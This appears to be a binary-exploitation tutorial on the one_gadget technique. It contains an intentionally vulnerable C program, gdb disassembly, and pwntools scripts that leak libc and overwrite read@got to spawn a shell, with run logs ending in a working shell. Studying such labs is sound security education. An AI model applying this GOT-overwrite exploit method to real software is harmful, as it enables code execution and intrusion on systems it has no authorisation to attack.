...
//gcc -fno-stack-protector -o onebaby onebaby.c -ldl
// Deliberately weak build for the one_gadget exercise: -fno-stack-protector
// drops the stack canary, and the fixed 0x4006xx / 0x6010xx addresses in the
// disassembly below show the binary is not PIE, so .bss and the GOT sit at
// known addresses. -ldl is only needed for dlsym(). A hardened build would
// use -fstack-protector-strong -fPIE -pie -Wl,-z,relro,-z,now (Full RELRO
// makes the GOT read-only, which defeats the overwrite used on this page).
#define _GNU_SOURCE            // RTLD_NEXT is a GNU extension
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <dlfcn.h>

// Global buffer in .bss (0x601080 in the build shown below). Nothing bounds
// the write in main() except the attacker-controlled index.
char asdf[1024];

int main()
{
    // 8-byte signed index, but the first read() below accepts up to 1024
    // bytes into it: a plain stack overflow (no canary), and any value,
    // including a negative one, is accepted as the index.
    long long index = 0;
    // Resolve printf in the next object after this one (libc) and print its
    // address: an info leak that reveals the libc base and defeats ASLR for
    // libc in a single line.
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    // All three read() return values are ignored; a short read leaves index
    // or asdf partially written without any error path.
    read(0, &index, 1024);
    // Unchecked, signed index: an arbitrary 8-byte write anywhere relative to
    // asdf. index = -0x60 lands on read@got (0x601020 - 0x601080), which is
    // writable because the binary is not linked with Full RELRO.
    read(0, asdf+index, 8);
    // This call dispatches through read@plt -> read@got, so once the GOT
    // entry has been overwritten above, control lands on whatever those
    // 8 bytes pointed at (a one_gadget in this writeup).
    read(0, &index, 1024);
    // No explicit return: main() returns 0 (the disassembly shows mov eax,0).
}
...
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ gdb -q ./onebaby Reading symbols from ./onebaby...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400676 <+0>: push rbp 0x0000000000400677 <+1>: mov rbp,rsp 0x000000000040067a <+4>: sub rsp,0x10 0x000000000040067e <+8>: mov QWORD PTR [rbp-0x10],0x0 0x0000000000400686 <+16>: mov esi,0x400784 0x000000000040068b <+21>: mov rdi,0xffffffffffffffff 0x0000000000400692 <+28>: call 0x400560 <dlsym@plt> 0x0000000000400697 <+33>: mov QWORD PTR [rbp-0x8],rax 0x000000000040069b <+37>: mov rax,QWORD PTR [rbp-0x8] 0x000000000040069f <+41>: mov rsi,rax 0x00000000004006a2 <+44>: mov edi,0x40078b 0x00000000004006a7 <+49>: mov eax,0x0 0x00000000004006ac <+54>: call 0x400530 <printf@plt> 0x00000000004006b1 <+59>: lea rax,[rbp-0x10] 0x00000000004006b5 <+63>: mov edx,0x400 0x00000000004006ba <+68>: mov rsi,rax 0x00000000004006bd <+71>: mov edi,0x0 0x00000000004006c2 <+76>: call 0x400540 <read@plt> 0x00000000004006c7 <+81>: mov rax,QWORD PTR [rbp-0x10] 0x00000000004006cb <+85>: add rax,0x601080 0x00000000004006d1 <+91>: mov edx,0x8 0x00000000004006d6 <+96>: mov rsi,rax 0x00000000004006d9 <+99>: mov edi,0x0 0x00000000004006de <+104>: call 0x400540 <read@plt> 0x00000000004006e3 <+109>: lea rax,[rbp-0x10] 0x00000000004006e7 <+113>: mov edx,0x400 0x00000000004006ec <+118>: mov rsi,rax 0x00000000004006ef <+121>: mov edi,0x0 0x00000000004006f4 <+126>: call 0x400540 <read@plt> 0x00000000004006f9 <+131>: mov eax,0x0 0x00000000004006fe <+136>: leave 0x00000000004006ff <+137>: ret End of assembler dump. gdb-peda$ b *0x00000000004006c2 Breakpoint 1 at 0x4006c2 gdb-peda$ b *0x00000000004006de Breakpoint 2 at 0x4006de gdb-peda$ b *0x00000000004006f4 Breakpoint 3 at 0x4006f4 gdb-peda$ |
...
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/OneGadgets/onebaby Printf() address : 0x7ffff785e800 Breakpoint 1, 0x00000000004006c2 in main () gdb-peda$ ni AAAAAAAAAAAAAAAA 0x00000000004006c7 in main () gdb-peda$ ni 0x00000000004006cb in main () gdb-peda$ x/i $rip => 0x4006cb <main+85>: add rax,0x601080 gdb-peda$ i r rax rax 0x4141414141414141 0x4141414141414141 gdb-peda$ p/x 0x4141414141414141 + 0x601080 $6 = 0x4141414141a151c1 gdb-peda$ p/x 0xffffffffffffffff + 0x601080 $7 = 0x60107f gdb-peda$ elfsymbol read Detail symbol info read@reloc = 0x1 read@plt = 0x400540 read@got = 0x601020 gdb-peda$ p/x 0x601020 - 0x601080 $8 = 0xffffffa0 gdb-peda$ p/x 0xffffffffffffffa0 + 0x601080 $9 = 0x601020 gdb-peda$ |
...
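from pwn import *

# Offsets below are specific to the libc build this writeup was run against;
# regenerate them for any other libc with
#   readelf -s libc.so.6 | grep ' printf@@'   and   one_gadget libc.so.6
PRINTF_OFFSET = 0x55800
# one_gadget candidate. Every candidate has a register/stack precondition that
# must hold at the moment read@plt is taken; when it does not, the process
# crashes instead of spawning a shell (compare the SIGSEGV run on this page).
ONE_GADGET_OFFSET = 0x4526a
# Index such that asdf + index == read@got: 0x601020 - 0x601080 = -0x60,
# encoded as an unsigned 64-bit two's-complement value.
READ_GOT_INDEX = 0xffffffffffffffa0

p = process('./onebaby')

# 1. Leak: the target prints the real address of printf, which gives the
#    libc base and defeats ASLR for libc.
p.recvuntil(b'Printf() address : ')
libcAddr = int(p.recvuntil(b'\n'), 16)
libcBase = libcAddr - PRINTF_OFFSET
# Sanity check: a libc base is always page-aligned. A non-aligned value means
# PRINTF_OFFSET does not match the libc actually loaded.
if libcBase & 0xfff:
    log.error('libc base ' + hex(libcBase) + ' is not page-aligned; wrong PRINTF_OFFSET for this libc')
oneGadget = libcBase + ONE_GADGET_OFFSET
# Low 16 bits of the gadget address, logged for reference only (not sent).
inputValue = oneGadget & 0xffff

log.info('libcBase Addr : ' + hex(libcBase))
log.info('oneGadget Addr : ' + hex(oneGadget))
log.info('Input value : ' + hex(inputValue))

# 2. The first read(0, &index, 1024) consumes everything already buffered on
#    stdin, so the index must arrive alone: send exactly 8 bytes (no trailing
#    newline) and pause before the payload so the two sends are not coalesced
#    into a single read(). The target prints nothing between the reads, so
#    there is nothing to synchronise on other than time.
p.send(p64(READ_GOT_INDEX))
sleep(0.5)
# 3. read(0, asdf + index, 8) now writes the gadget address over read@got; the
#    third read() in main() goes through read@plt and lands on the gadget.
p.send(p64(oneGadget))
p.interactive()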
...
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploit.py [+] Starting local process './onebaby': pid 17043 [*] libcBase Addr : 0x7f0dde749000 [*] oneGadget Addr : 0x7f0dde78e26a [*] Input value : 0xe26a [*] Switching to interactive mode $ [*] Got EOF while reading in interactive $ [*] Process './onebaby' stopped with exit code -11 (SIGSEGV) (pid 17043) [*] Got EOF while sending in interactive lazenca0x0@ubuntu:~/Exploit/OneGadgets$ |
...
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploit.py [+] Starting local process './onebaby': pid 15978 [*] libcBase Addr : 0x7f930739d000 [*] oneGadget Addr : 0x7f93073e2216 [*] Input value : 0x2216 [*] Switching to interactive mode $ |
...
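from pwn import *

# Offsets below are specific to the libc build this writeup was run against;
# regenerate them for any other libc with
#   readelf -s libc.so.6 | grep ' printf@@'   and   one_gadget libc.so.6
PRINTF_OFFSET = 0x55800
# one_gadget candidate. Every candidate has a register/stack precondition that
# must hold at the moment read@plt is taken; if it does not, the process
# crashes instead of spawning a shell.
ONE_GADGET_OFFSET = 0x4526a
# Index such that asdf + index == read@got of ./one (-0x58 as an unsigned
# 64-bit value). This is a different binary from ./onebaby, so confirm the
# GOT address with `elfsymbol read` in gdb-peda before reusing the value.
READ_GOT_INDEX = 0xffffffffffffffa8

p = process('./one')

# 1. Leak: the target prints the real address of printf, which gives the
#    libc base and defeats ASLR for libc.
p.recvuntil(b'Printf() address : ')
libcAddr = int(p.recvuntil(b'\n'), 16)
libcBase = libcAddr - PRINTF_OFFSET
# Sanity check: a libc base is always page-aligned. A non-aligned value means
# PRINTF_OFFSET does not match the libc actually loaded.
if libcBase & 0xfff:
    log.error('libc base ' + hex(libcBase) + ' is not page-aligned; wrong PRINTF_OFFSET for this libc')
oneGadget = libcBase + ONE_GADGET_OFFSET
# Low 16 bits of the gadget address, logged for reference only (not sent).
inputValue = oneGadget & 0xffff

log.info('libcBase Addr : ' + hex(libcBase))
log.info('oneGadget Addr : ' + hex(oneGadget))
log.info('Input value : ' + hex(inputValue))

# 2. The first read(0, &index, 1024) consumes everything already buffered on
#    stdin, so the index must arrive alone: send exactly 8 bytes (no trailing
#    newline) and pause before the payload so the two sends are not coalesced
#    into a single read(). The target prints nothing between the reads, so
#    there is nothing to synchronise on other than time.
p.send(p64(READ_GOT_INDEX))
sleep(0.5)
# 3. read(0, asdf + index, 8) now writes the gadget address over read@got; the
#    next read() call goes through read@plt and lands on the gadget.
p.send(p64(oneGadget))
p.interactive()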
...
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploitexploit-2.py [+] Starting local process './one': pid 18745 [*] libcBase Addr : 0x7f10b5ed8000 [*] oneGadget Addr : 0x7f10b5f1d26a [*] Input value : 0xd26a [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
...